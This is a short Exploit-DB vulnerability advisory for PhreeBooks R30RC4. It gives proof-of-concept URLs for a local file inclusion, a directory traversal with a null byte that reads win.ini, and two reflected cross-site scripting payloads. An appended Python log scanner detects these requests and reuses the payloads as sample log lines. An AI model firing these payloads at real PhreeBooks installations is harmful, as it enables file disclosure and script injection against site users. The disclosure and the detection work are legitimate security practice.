PhreeBooks R30RC4 – Multiple Vulnerabilities

  • Author: AutoSec Tools
    Date: 2011-02-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/16249/
  • ------------------------------------------------------------------------
    Software................PhreeBooks R30RC4
    Vulnerability...........Local File Inclusion
    Download................http://sourceforge.net/projects/phreebooks
    Release Date............2/22/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    ------------------------------------------------------------------------
    
    --PoC--
    http://localhost/phreedom/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00
    
    
    ------------------------------------------------------------------------
    Software................PhreeBooks R30RC4
    Vulnerability...........Reflected Cross-site Scripting
    Download................http://sourceforge.net/projects/phreebooks
    Release Date............2/22/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    ------------------------------------------------------------------------
    
    --PoC--
    http://localhost/phreedom/modules/shipping/pages/popup_shipping/js_include.php?form=';alert(0)%3C/script%3E
    
    http://localhost/phreedom/modules/shipping/methods/fedex_v7/label_mgr/js_include.php?form=%22;alert(0)%3C/script%3E
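
Detection logic for the two request shapes above, added here as an example and not part of the original advisory: it percent-decodes the query string and flags directory traversal or a NUL byte in `page`, and any `form` value that is not a plain identifier. The identifier rule, the Apache combined log format, the label names and the sample log lines (including the benign `page=main` and `form=step1` values) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption (not from the advisory): a legitimate `form` value is a plain identifier.
SAFE_FORM = re.compile(r"[A-Za-z0-9_]*")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return sorted finding labels for one request target (path + query)."""
    parts = urlsplit(target)
    findings = set()
    # parse_qsl percent-decodes values, so %2F, %00 and %3C are checked decoded.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "page" and parts.path.endswith("/index.php"):
            if "\x00" in value:
                findings.add("lfi-null-byte")
            if TRAVERSAL.search(value):
                findings.add("lfi-traversal")
        elif name == "form" and parts.path.endswith("/js_include.php"):
            if not SAFE_FORM.fullmatch(value):
                findings.add("xss-form-breakout")
    return sorted(findings)

def scan(log_lines):
    """Return (target, findings) for every log line that trips a check."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m:
            found = classify(m.group(1))
            if found:
                hits.append((m.group(1), found))
    return hits

# Constructed access-log lines; the first two request targets are the PoCs above.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2011:10:00:00 +0000] "GET /phreedom/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00 HTTP/1.1" 200 512',
    '192.0.2.10 - - [26/Feb/2011:10:00:05 +0000] "GET /phreedom/modules/shipping/methods/fedex_v7/label_mgr/js_include.php?form=%22;alert(0)%3C/script%3E HTTP/1.1" 200 300',
    '192.0.2.11 - - [26/Feb/2011:10:01:00 +0000] "GET /phreedom/index.php?page=main HTTP/1.1" 200 4096',
    '192.0.2.11 - - [26/Feb/2011:10:01:02 +0000] "GET /phreedom/modules/shipping/pages/popup_shipping/js_include.php?form=step1 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(findings, target)
```

The checks run on decoded values, so encoded variants such as `%2f` and `%2F` are treated alike.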